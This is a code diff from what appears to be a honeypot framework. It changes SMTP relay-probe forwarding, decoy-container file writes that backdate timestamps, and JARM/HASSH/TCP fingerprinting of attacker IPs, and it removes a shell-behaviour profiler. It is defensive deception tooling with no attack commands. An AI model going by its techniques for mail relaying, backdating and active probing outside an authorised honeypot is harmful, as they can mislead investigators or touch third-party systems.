        Always safe to call in a thread — uses only blocking I/O.
    """
    upstream_host = (svc_cfg.get("upstream_host") or "").strip()
    if not upstream_host:
        return False, "upstream_host not configured"

    # stored_as / decky_name arrive in an event payload.  Resolve them and
    # refuse anything ("..", absolute paths, symlinks) that would make us
    # read — and then mail out — a file outside this decky's smtp directory.
    try:
        root = Path(artifacts_root).resolve()
        smtp_dir = (root / decky_name / "smtp").resolve()
        eml_path = (smtp_dir / stored_as).resolve()
    except (OSError, RuntimeError, ValueError) as exc:
        return False, f"invalid artifact path: {exc}"
    if not (smtp_dir.is_relative_to(root) and eml_path.is_relative_to(smtp_dir)):
        return False, "artifact path escapes artifacts root"

    try:
        body = eml_path.read_bytes()
    except OSError as exc:
        return False, f"cannot read eml: {exc}"

    if not rcpt_to:
        return False, "no recipients"

    try:
        upstream_port = int(svc_cfg.get("upstream_port") or 25)
    except (TypeError, ValueError):
        # Keep the (False, reason) contract instead of raising in the caller's thread.
        return False, "invalid upstream_port"
    upstream_user = (svc_cfg.get("upstream_user") or "").strip()
    upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
    envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from

    # Ensure the message has a From: header so mail clients show the attacker's
    # address rather than falling back to the envelope sender (upstream_sender).
    # Minimal relay-test scripts often omit headers entirely.
    body = _ensure_from_header(body, mail_from)

    try:
        with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
            conn.ehlo()
            if conn.has_extn("STARTTLS"):
                conn.starttls()
                conn.ehlo()
            # NOTE(review): credentials are sent even when the upstream did
            # not offer STARTTLS — confirm that is acceptable.
            if upstream_user and upstream_pass:
                conn.login(upstream_user, upstream_pass)
            conn.sendmail(envelope_from, rcpt_to, body)
        return True, ""
    except Exception as exc:
        # Reason is truncated so it stays small when stored by the caller.
        return False, str(exc)[:256]
|
||||
@@ -18,8 +18,11 @@ or IP can't escape into a shell.
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import shlex
|
||||
from typing import Any
|
||||
from datetime import datetime
|
||||
|
||||
import base64
|
||||
from datetime import datetime, timezone
|
||||
|
||||
from decnet.logging import get_logger
|
||||
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
||||
@@ -223,24 +226,36 @@ class SSHDriver(ActivityDriver):
|
||||
) -> ActivityResult:
|
||||
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
||||
|
||||
Delegates to :func:`decnet.decky_io.write_file_to_container`,
|
||||
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
|
||||
file mode and, when *mtime* is provided, ``touch -d`` to
|
||||
backdate the file (otherwise everything stamps at wall-clock-now
|
||||
— the realism failure this path was originally fixing).
|
||||
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
|
||||
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
|
||||
when *mtime* is provided, ``touch -d`` to backdate the file so
|
||||
it doesn't all stamp at wall-clock-now (the realism failure
|
||||
this migration is fixing).
|
||||
"""
|
||||
from decnet.decky_io import write_file_to_container
|
||||
|
||||
container = _container_for(decky_name)
|
||||
success, error = await write_file_to_container(
|
||||
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
|
||||
b64 = base64.b64encode(content).decode("ascii")
|
||||
# touch -d accepts ISO 8601; we always emit UTC so the
|
||||
# container's local TZ doesn't drift the mtime.
|
||||
if mtime is not None:
|
||||
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
|
||||
else:
|
||||
touch_cmd = f"touch {shlex.quote(path)}"
|
||||
sh_cmd = (
|
||||
f"mkdir -p {shlex.quote(_dirname(path))} && "
|
||||
f"base64 -d > {shlex.quote(path)} && "
|
||||
f"chmod {mode:o} {shlex.quote(path)} && "
|
||||
f"{touch_cmd}"
|
||||
)
|
||||
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
||||
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
|
||||
success = rc == 0
|
||||
payload: dict[str, Any] = {
|
||||
"dst_decky": decky_name,
|
||||
"path": path,
|
||||
"bytes": len(content),
|
||||
"rc": 0 if success else 1,
|
||||
"stderr": error if not success else None,
|
||||
"rc": rc,
|
||||
"stderr": stderr.strip()[:256] if not success else None,
|
||||
}
|
||||
return ActivityResult(success=success, payload=payload)
|
||||
|
||||
@@ -268,3 +283,11 @@ class SSHDriver(ActivityDriver):
|
||||
)
|
||||
|
||||
|
||||
def _dirname(path: str) -> str:
|
||||
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
|
||||
host to share the destination container's separator semantics, but
|
||||
deckies are POSIX so a plain ``rfind('/')`` suffices."""
|
||||
idx = path.rfind("/")
|
||||
if idx <= 0:
|
||||
return "/"
|
||||
return path[:idx]
|
||||
|
||||
@@ -131,13 +131,13 @@ async def _resolve_personas(
|
||||
topology = await repo.get_topology(topology_id)
|
||||
if not topology:
|
||||
return [], source
|
||||
if isinstance(topology, dict):
|
||||
raw = topology.get("email_personas")
|
||||
lang = topology.get("language_default") or "en"
|
||||
else:
|
||||
raw = topology.email_personas
|
||||
lang = topology.language_default or "en"
|
||||
return parse_personas(raw, language_default=lang), source
|
||||
return (
|
||||
parse_personas(
|
||||
topology.get("email_personas"),
|
||||
language_default=topology.get("language_default") or "en",
|
||||
),
|
||||
source,
|
||||
)
|
||||
# Fleet / shard / anything else → global pool.
|
||||
return global_pool.load(), source
|
||||
|
||||
@@ -175,7 +175,7 @@ async def pick(
|
||||
)
|
||||
return None
|
||||
|
||||
active = [p for p in personas if in_active_hours(p, now_dt)]
|
||||
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
|
||||
if len(active) < 2:
|
||||
logger.debug(
|
||||
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
||||
|
||||
@@ -311,22 +311,17 @@ async def _resolve_personas(
|
||||
return enriched
|
||||
|
||||
|
||||
def _topology_personas(topology) -> list[EmailPersona]:
|
||||
def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
|
||||
if not topology:
|
||||
return []
|
||||
if isinstance(topology, dict):
|
||||
raw = topology.get("email_personas")
|
||||
lang = topology.get("language_default") or "en"
|
||||
else:
|
||||
raw = topology.email_personas
|
||||
lang = topology.language_default or "en"
|
||||
raw = topology.get("email_personas")
|
||||
if raw is None:
|
||||
return []
|
||||
if isinstance(raw, list):
|
||||
return parse_personas(raw, language_default=lang)
|
||||
return parse_personas(raw, language_default=topology.get("language_default") or "en")
|
||||
if isinstance(raw, str):
|
||||
try:
|
||||
return parse_personas(json.loads(raw), language_default=lang)
|
||||
return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
|
||||
except json.JSONDecodeError:
|
||||
return []
|
||||
return []
|
||||
|
||||
@@ -25,7 +25,6 @@ import secrets
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Optional
|
||||
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.bus.publish import (
|
||||
publish_safely,
|
||||
@@ -35,7 +34,6 @@ from decnet.bus.publish import (
|
||||
from decnet.logging import get_logger
|
||||
from decnet.orchestrator import events, scheduler
|
||||
from decnet.orchestrator.drivers import get_driver_for
|
||||
from decnet.orchestrator.drivers.smtp_relay import forward_probe
|
||||
from decnet.orchestrator.emailgen import (
|
||||
events as email_events,
|
||||
scheduler as email_scheduler,
|
||||
@@ -129,7 +127,6 @@ async def orchestrator_worker(
|
||||
# operator's intent rather than the baked-in defaults. A failure
|
||||
# here logs and falls through; the planner already holds defaults.
|
||||
await _refresh_realism_config(repo)
|
||||
await _refresh_llm_config(repo)
|
||||
|
||||
shutdown = asyncio.Event()
|
||||
heartbeat_task = asyncio.create_task(
|
||||
@@ -141,9 +138,6 @@ async def orchestrator_worker(
|
||||
control_task = asyncio.create_task(
|
||||
run_control_listener(bus, "orchestrator", shutdown),
|
||||
)
|
||||
probe_task = asyncio.create_task(
|
||||
_run_smtp_probe_listener(repo, shutdown),
|
||||
)
|
||||
tick_n = 0
|
||||
try:
|
||||
while not shutdown.is_set():
|
||||
@@ -162,9 +156,8 @@ async def orchestrator_worker(
|
||||
await _periodic_prune(repo)
|
||||
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
||||
await _refresh_realism_config(repo)
|
||||
await _refresh_llm_config(repo)
|
||||
finally:
|
||||
for t in (heartbeat_task, control_task, probe_task):
|
||||
for t in (heartbeat_task, control_task):
|
||||
t.cancel()
|
||||
with contextlib.suppress(Exception, asyncio.CancelledError):
|
||||
await t
|
||||
@@ -225,18 +218,6 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
|
||||
logger.warning("realism config refresh: rejected payload: %s", exc)
|
||||
|
||||
|
||||
async def _refresh_llm_config(repo: BaseRepository) -> None:
    """Pull operator-tuned LLM config from realism_config into the backend cache.

    Best-effort: a failure to load or to apply the config is logged as a
    warning and the previously applied config stays in effect.
    """
    from decnet.realism.llm.config import apply, load_from_db

    try:
        cfg = await load_from_db(repo)
    except Exception as exc:  # noqa: BLE001
        # Runs at startup and on the tick loop; a load failure must not
        # take the worker down.
        logger.warning("llm config refresh: load failed: %s", exc)
        return
    if cfg is None:
        return
    try:
        apply(cfg)
    except Exception as exc:  # noqa: BLE001
        logger.warning("llm config refresh: apply failed: %s", exc)
|
||||
|
||||
|
||||
def _roll_action_kind(rng: secrets.SystemRandom) -> str:
|
||||
total = sum(w for _, w in _ACTION_WEIGHTS)
|
||||
target = rng.randint(1, total)
|
||||
@@ -322,7 +303,7 @@ async def _pick_action(
|
||||
)
|
||||
elif kind == "email":
|
||||
try:
|
||||
action = await email_scheduler.pick(repo, rand=rng) # type: ignore[assignment]
|
||||
action = await email_scheduler.pick(repo, rand=rng)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
logger.debug("orchestrator: email pick failed: %s", exc)
|
||||
action = None
|
||||
@@ -486,100 +467,6 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
|
||||
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
||||
|
||||
|
||||
async def _run_smtp_probe_listener(
    repo: BaseRepository,
    shutdown: asyncio.Event,
) -> None:
    """Subscribe to smtp.probe.pending and forward probe emails upstream.

    Runs as a long-lived subtask alongside the tick loop.  Each event's
    payload is handed to :func:`_handle_probe_pending`; an error while
    handling one event is logged and the loop continues.  If the bus
    cannot be obtained, connected or subscribed, a warning is logged and
    the listener returns without retrying.

    Args:
        repo: Repository passed through to the per-event handler.
        shutdown: Checked after each received event; when set, the loop exits.
    """
    bus = None  # bound up front so ``finally`` is valid even if get_bus() raises
    try:
        bus = get_bus(client_name="orchestrator-probe")
        await bus.connect()
        sub = bus.subscribe(_topics.smtp("probe.pending"))
        async with sub:
            async for event in sub:
                if shutdown.is_set():
                    break
                try:
                    await _handle_probe_pending(repo, event.payload)
                except Exception as exc:  # noqa: BLE001
                    logger.warning("smtp probe listener: handle error: %s", exc)
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        logger.warning("smtp probe listener: bus unavailable: %s", exc)
    finally:
        if bus is not None:
            with contextlib.suppress(Exception):
                await bus.close()
|
||||
|
||||
|
||||
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
    """Forward one pending SMTP probe and record the outcome as a bounty.

    Returns silently (no forward, no bounty) when the payload lacks
    ``decky`` / ``attacker_ip`` / ``stored_as``, when the decky is
    unknown, when its ``smtp_relay`` config has no ``upstream_host``, or
    when ``count_probe_relays`` has reached ``probe_limit`` (default 1).
    Otherwise the blocking forward runs in a worker thread and a
    ``probe_relay`` bounty is stored whether or not it succeeded.

    Args:
        repo: Repository used for the decky lookup, the relay count and
            the bounty insert.
        payload: Event payload; reads ``decky``, ``attacker_ip``,
            ``stored_as``, ``mail_from`` and comma-separated ``rcpt_to``.
    """
    decky_name = (payload.get("decky") or "").strip()
    attacker_ip = (payload.get("attacker_ip") or "").strip()
    stored_as = (payload.get("stored_as") or "").strip()
    mail_from = (payload.get("mail_from") or "").strip()
    rcpt_to_raw = (payload.get("rcpt_to") or "").strip()

    if not (decky_name and attacker_ip and stored_as):
        return

    decky_row = await repo.get_fleet_decky_by_name(decky_name)
    if not decky_row:
        return
    # Each level may be missing or None; fall back to {} at every step.
    decky_cfg = decky_row.get("decky_config") or {}
    svc_cfg = (decky_cfg.get("service_config") or {}).get("smtp_relay") or {}
    if not (svc_cfg.get("upstream_host") or "").strip():
        return

    probe_limit = int(svc_cfg.get("probe_limit") or 1)
    already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
    if already_sent >= probe_limit:
        return

    rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
    artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")

    # forward_probe does blocking file and SMTP I/O; keep it off the event loop.
    ok, reason = await asyncio.to_thread(
        forward_probe,
        svc_cfg=svc_cfg,
        stored_as=stored_as,
        decky_name=decky_name,
        mail_from=mail_from,
        rcpt_to=rcpt_to,
        artifacts_root=artifacts_root,
    )

    await repo.add_bounty({
        "decky": decky_name,
        "service": "smtp_relay",
        "attacker_ip": attacker_ip,
        "bounty_type": "probe_relay",
        "payload": {
            "stored_as": stored_as,
            "forwarded": ok,
            **({"fwd_error": reason} if not ok else {}),
        },
    })
    if ok:
        logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
    else:
        logger.warning(
            "smtp probe forward failed decky=%s ip=%s error=%s",
            decky_name, attacker_ip, reason,
        )
|
||||
|
||||
|
||||
async def _record_synthetic_file(repo, action) -> None:
|
||||
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
||||
|
||||
|
||||
@@ -48,7 +48,7 @@ def _send_syn(
|
||||
Craft a TCP SYN with common options and send it. Returns the
|
||||
SYN-ACK response packet or None on timeout/failure.
|
||||
"""
|
||||
from scapy.all import IP, TCP, conf, sr1 # type: ignore[attr-defined]
|
||||
from scapy.all import IP, TCP, conf, sr1
|
||||
|
||||
# Suppress scapy's noisy output
|
||||
conf.verb = 0
|
||||
@@ -83,7 +83,7 @@ def _send_syn(
|
||||
return None
|
||||
|
||||
# Verify it's a SYN-ACK (flags == 0x12)
|
||||
from scapy.all import TCP as TCPLayer # type: ignore[attr-defined]
|
||||
from scapy.all import TCP as TCPLayer
|
||||
if not resp.haslayer(TCPLayer):
|
||||
return None
|
||||
if resp[TCPLayer].flags != 0x12: # SYN-ACK
|
||||
@@ -103,7 +103,7 @@ def _send_rst(
|
||||
) -> None:
|
||||
"""Send RST to clean up the half-open connection."""
|
||||
try:
|
||||
from scapy.all import IP, TCP, send # type: ignore[attr-defined]
|
||||
from scapy.all import IP, TCP, send
|
||||
rst = (
|
||||
IP(dst=host)
|
||||
/ TCP(
|
||||
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
|
||||
"""
|
||||
Extract fingerprint fields from a scapy SYN-ACK response packet.
|
||||
"""
|
||||
from scapy.all import IP, TCP # type: ignore[attr-defined]
|
||||
from scapy.all import IP, TCP
|
||||
|
||||
ip_layer = resp[IP]
|
||||
tcp_layer = resp[TCP]
|
||||
|
||||
@@ -27,9 +27,6 @@ from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from typing import Any, Callable
|
||||
|
||||
from sqlalchemy.engine import Engine
|
||||
from sqlmodel import Session
|
||||
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
@@ -38,10 +35,6 @@ from decnet.bus.publish import (
|
||||
run_control_listener,
|
||||
run_health_heartbeat,
|
||||
)
|
||||
from decnet.correlation.fingerprint_rotation import (
|
||||
ProbeType,
|
||||
record_fingerprint,
|
||||
)
|
||||
from decnet.logging import get_logger
|
||||
from decnet.prober.hassh import hassh_server
|
||||
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
|
||||
@@ -51,21 +44,6 @@ from decnet.telemetry import traced as _traced
|
||||
|
||||
logger = get_logger("prober")
|
||||
|
||||
|
||||
def _build_sync_engine() -> Engine:
    """Construct a sync SQLite engine for rotation-detection state.

    Used inline by the prober; it lives outside the async repository
    layer because rotation detection is a sync hook on a sync probe
    path.  Honors the same defaulting as
    ``decnet.web.db.sqlite.repository.SQLiteRepository``.

    Returns:
        The engine from ``get_sync_engine`` for the path in
        ``DECNET_DB_PATH``, falling back to ``<_ROOT>/decnet.db``.
    """
    # Imported lazily, as in the original, so they load only when called.
    import os
    from decnet.config import _ROOT
    from decnet.web.db.sqlite.database import get_sync_engine

    db_path = os.environ.get("DECNET_DB_PATH", str(_ROOT / "decnet.db"))
    return get_sync_engine(db_path)
|
||||
|
||||
# ─── Default ports per probe type ───────────────────────────────────────────
|
||||
|
||||
# JARM: common C2 callback / TLS server ports
|
||||
@@ -255,14 +233,6 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
|
||||
|
||||
ProbePublishFn = Callable[[str, dict[str, Any]], None]
|
||||
|
||||
# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
|
||||
# performs the rotation-detection upsert + derived-event emission for the
|
||||
# DEBT-032 substrate-fingerprint flow. Optional; when None the prober
|
||||
# behaves exactly as before (raw fingerprint emit only, no rotation
|
||||
# detection). Construction lives at worker startup so phase functions
|
||||
# don't have to know about the DB engine.
|
||||
RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
|
||||
|
||||
|
||||
@_traced("prober.probe_cycle")
|
||||
def _probe_cycle(
|
||||
@@ -275,7 +245,6 @@ def _probe_cycle(
|
||||
json_path: Path,
|
||||
timeout: float = 5.0,
|
||||
publish_fn: ProbePublishFn | None = None,
|
||||
record_rotation: RotationRecorderFn | None = None,
|
||||
) -> None:
|
||||
"""
|
||||
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
|
||||
@@ -294,13 +263,13 @@ def _probe_cycle(
|
||||
ip_probed = probed.setdefault(ip, {})
|
||||
|
||||
# Phase 1: JARM (TLS fingerprinting)
|
||||
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
|
||||
|
||||
# Phase 2: HASSHServer (SSH fingerprinting)
|
||||
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
|
||||
|
||||
# Phase 3: TCP/IP stack fingerprinting
|
||||
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
|
||||
|
||||
|
||||
@_traced("prober.jarm_phase")
|
||||
@@ -312,7 +281,6 @@ def _jarm_phase(
|
||||
json_path: Path,
|
||||
timeout: float,
|
||||
publish_fn: ProbePublishFn | None = None,
|
||||
record_rotation: RotationRecorderFn | None = None,
|
||||
) -> None:
|
||||
"""JARM-fingerprint an IP on the given TLS ports."""
|
||||
done = ip_probed.setdefault("jarm", set())
|
||||
@@ -333,8 +301,6 @@ def _jarm_phase(
|
||||
msg=f"JARM {ip}:{port} = {h}",
|
||||
)
|
||||
logger.info("prober: JARM %s:%d = %s", ip, port, h)
|
||||
if record_rotation is not None:
|
||||
record_rotation(ip, port, "jarm", h)
|
||||
if publish_fn is not None:
|
||||
publish_fn(
|
||||
"jarm",
|
||||
@@ -421,7 +387,6 @@ def _hassh_phase(
|
||||
json_path: Path,
|
||||
timeout: float,
|
||||
publish_fn: ProbePublishFn | None = None,
|
||||
record_rotation: RotationRecorderFn | None = None,
|
||||
) -> None:
|
||||
"""HASSHServer-fingerprint an IP on the given SSH ports."""
|
||||
done = ip_probed.setdefault("hassh", set())
|
||||
@@ -447,8 +412,6 @@ def _hassh_phase(
|
||||
msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
|
||||
)
|
||||
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
|
||||
if record_rotation is not None:
|
||||
record_rotation(ip, port, "hassh", result["hassh_server"])
|
||||
if publish_fn is not None:
|
||||
publish_fn(
|
||||
"hassh",
|
||||
@@ -482,7 +445,6 @@ def _tcpfp_phase(
|
||||
json_path: Path,
|
||||
timeout: float,
|
||||
publish_fn: ProbePublishFn | None = None,
|
||||
record_rotation: RotationRecorderFn | None = None,
|
||||
) -> None:
|
||||
"""TCP/IP stack fingerprint an IP on the given ports."""
|
||||
done = ip_probed.setdefault("tcpfp", set())
|
||||
@@ -516,8 +478,6 @@ def _tcpfp_phase(
|
||||
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
|
||||
)
|
||||
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
|
||||
if record_rotation is not None:
|
||||
record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
|
||||
if publish_fn is not None:
|
||||
publish_fn(
|
||||
"tcpfp",
|
||||
@@ -626,61 +586,6 @@ async def prober_worker(
|
||||
event_type,
|
||||
)
|
||||
|
||||
# Substrate-rotation detection (DEBT-032) — open a sync engine for
|
||||
# the prober's lifetime; recorder closes a session per call so we
|
||||
# never hold a connection across phase boundaries. Failure to
|
||||
# connect is non-fatal: probes continue, rotation detection is
|
||||
# silently disabled.
|
||||
rotation_engine: Engine | None = None
|
||||
record_rotation: RotationRecorderFn | None = None
|
||||
try:
|
||||
rotation_engine = _build_sync_engine()
|
||||
except Exception as exc: # noqa: BLE001
|
||||
logger.warning(
|
||||
"prober: rotation-detection DB unavailable, "
|
||||
"running with rotation detection disabled: %s", exc,
|
||||
)
|
||||
|
||||
if rotation_engine is not None:
|
||||
def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
|
||||
raw_publish(
|
||||
_topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
|
||||
payload,
|
||||
event_type,
|
||||
)
|
||||
|
||||
def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
|
||||
_write_event(
|
||||
log_path, json_path,
|
||||
"fingerprint_rotated",
|
||||
target_ip=payload["attacker_ip"],
|
||||
target_port=str(payload["port"]),
|
||||
probe_type=payload["probe_type"],
|
||||
old_hash=payload.get("old_hash") or "",
|
||||
new_hash=payload["new_hash"],
|
||||
rotation_count=str(payload["rotation_count"]),
|
||||
msg=(
|
||||
f"FP rotation {payload['attacker_ip']}:{payload['port']} "
|
||||
f"{payload['probe_type']} {payload.get('old_hash')} → "
|
||||
f"{payload['new_hash']}"
|
||||
),
|
||||
)
|
||||
|
||||
def record_rotation(
|
||||
ip: str, port: int, probe_type: ProbeType, new_hash: str,
|
||||
) -> None:
|
||||
with Session(rotation_engine) as session:
|
||||
record_fingerprint(
|
||||
session,
|
||||
attacker_ip=ip,
|
||||
port=port,
|
||||
probe_type=probe_type,
|
||||
new_hash=new_hash,
|
||||
ts=datetime.now(timezone.utc),
|
||||
publish_fn=_publish_rotation,
|
||||
syslog_fn=_syslog_rotation,
|
||||
)
|
||||
|
||||
shutdown = asyncio.Event()
|
||||
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
|
||||
control_task = asyncio.create_task(
|
||||
@@ -707,7 +612,6 @@ async def prober_worker(
|
||||
jarm_ports, hassh_ports, tcp_ports,
|
||||
log_path, json_path, timeout,
|
||||
_publish_attacker,
|
||||
record_rotation,
|
||||
)
|
||||
|
||||
try:
|
||||
@@ -722,6 +626,3 @@ async def prober_worker(
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
if rotation_engine is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
rotation_engine.dispose()
|
||||
|
||||
@@ -1,25 +0,0 @@
|
||||
"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
|
||||
|
||||
Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
|
||||
library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
|
||||
emission, and persistence. The engine just turns one PTY session into
|
||||
``Iterable[Observation]``.
|
||||
|
||||
BEHAVE is the spec; DECNET is the engine.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.profiler.behave_shell.extract import (
|
||||
DEFAULT_SOURCE,
|
||||
build_context,
|
||||
extract_session,
|
||||
)
|
||||
|
||||
# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
|
||||
# emit; calibration grid honest). The ``-pre`` suffix stays until
|
||||
# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
|
||||
# table writes + AttackerDetail panel; only then does H.5 proper drop the
|
||||
# suffix and tag v0.
|
||||
__version__ = "0.1.0-pre"
|
||||
|
||||
__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]
|
||||
@@ -1,573 +0,0 @@
|
||||
"""SessionContext: precomputed bundle every feature function reads from.
|
||||
|
||||
A naïve engine re-walks the event stream once per primitive. We don't
|
||||
do that — one walk over the events builds this context, every feature
|
||||
reads from it. Adding a new feature is O(1) cost on the parse side.
|
||||
|
||||
Step 1 fills ``iats`` (inter-key intervals between input events) and
|
||||
``paste_bursts`` (contiguous runs of paste-class events). Step 4
|
||||
will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import math
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Iterable, Mapping
|
||||
|
||||
from decnet.profiler.behave_shell._intent import (
|
||||
LEXEME_MAX_LEN,
|
||||
NEGATIVE_LEXEMES,
|
||||
OBSCENITY_LEXEMES,
|
||||
POSITIVE_LEXEMES,
|
||||
)
|
||||
from decnet.profiler.behave_shell._parse import (
|
||||
AsciinemaEvent,
|
||||
Command,
|
||||
PasteBurst,
|
||||
PromptLine,
|
||||
detect_error_in_output,
|
||||
extract_prompt_lines,
|
||||
hash_token,
|
||||
strip_ansi,
|
||||
)
|
||||
from decnet.profiler.behave_shell._thresholds import (
|
||||
IKI_THINK_MAX_S,
|
||||
LAYOUT_BIGRAM_TOP_N,
|
||||
PASTE_BURST_MAX_IAT_S,
|
||||
PASTE_MIN_CHARS_PER_EVENT,
|
||||
PROMPT_LINE_MAX_CHARS,
|
||||
SHORTCUT_CTRL_BYTES,
|
||||
)
|
||||
|
||||
|
||||
@dataclass(frozen=True, slots=True)
class _LexCounters:
    """Lexical counters from the typed-text walk (G.0).

    Internal to the ctx-builder; flattened onto SessionContext fields
    in :func:`build_session_context`. Produced by
    :func:`_typed_char_histograms`, which skips paste-class events, so
    every counter here describes typed input only.
    """
    # Words whose longest matching suffix is in OBSCENITY_LEXEMES.
    obscenity_hits: int = 0
    # Words whose longest matching suffix is in POSITIVE_LEXEMES.
    positive_lex_hits: int = 0
    # Words whose longest matching suffix is in NEGATIVE_LEXEMES.
    negative_lex_hits: int = 0
    # Longest run of consecutive ASCII upper-case characters.
    caps_run_max: int = 0
    # Longest run of consecutive "!" characters.
    bang_run_max: int = 0
|
||||
|
||||
|
||||
@dataclass(frozen=True, slots=True)
class SessionContext:
    """Immutable bundle of per-session derivations read by feature functions.

    Instances are assembled by :func:`build_session_context`. The
    dataclass is frozen and every sequence field is a tuple. The two
    histogram fields are typed as ``Mapping`` but are ordinary dicts at
    runtime, so ``frozen`` does not stop their contents being mutated —
    treat them as read-only.
    """
    # Caller-supplied session identifier and observation source label.
    sid: str
    source: str
    # Falls back to ``"session:<sid>"`` when the builder gets no explicit value.
    evidence_ref: str
    # Timestamp of the first event / largest timestamp seen (both 0.0
    # for an empty stream) and their non-negative difference.
    t_start: float
    t_end: float
    duration_s: float

    # Events of kind "i" and "o" respectively, in arrival order.
    input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
    output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)

    # Step 1 derivations
    # ``iats``: gaps between consecutive input events, clamped at 0.
    iats: tuple[float, ...] = field(default_factory=tuple)
    paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
    # Number of individual paste-class input events (not bursts).
    paste_event_count: int = 0

    # Step 4 derivations — command segmentation
    commands: tuple[Command, ...] = field(default_factory=tuple)
    # Both tuples have ``len(commands) - 1`` entries: entry ``i`` covers
    # the gap between command ``i`` ending and command ``i + 1`` starting.
    inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
    output_per_cmd: tuple[int, ...] = field(default_factory=tuple)

    # Step B.1 derivations — typing bursts (IATs split at think-pauses)
    typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)

    # Step B.3 derivations — error-correction signals
    backspace_count: int = 0
    # Time from the most recent non-backspace character to each backspace.
    backspace_iats: tuple[float, ...] = field(default_factory=tuple)
    kill_line_count: int = 0

    # Step B.4 derivations — per-command intra-typing IATs
    # One inner tuple per entry of ``commands``, in the same order.
    intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)

    # Step F.0 derivations — PS1 prompt lines detected in the output stream
    prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)

    # Step F.4 derivations — typed-only character histograms for keyboard
    # layout fingerprinting (PII boundary lifted by ANTI for Phase F).
    # Keys are lower-cased ASCII letters / letter pairs; the bigram map is
    # truncated to the LAYOUT_BIGRAM_TOP_N most frequent entries.
    typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
    typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
    typed_letter_count: int = 0

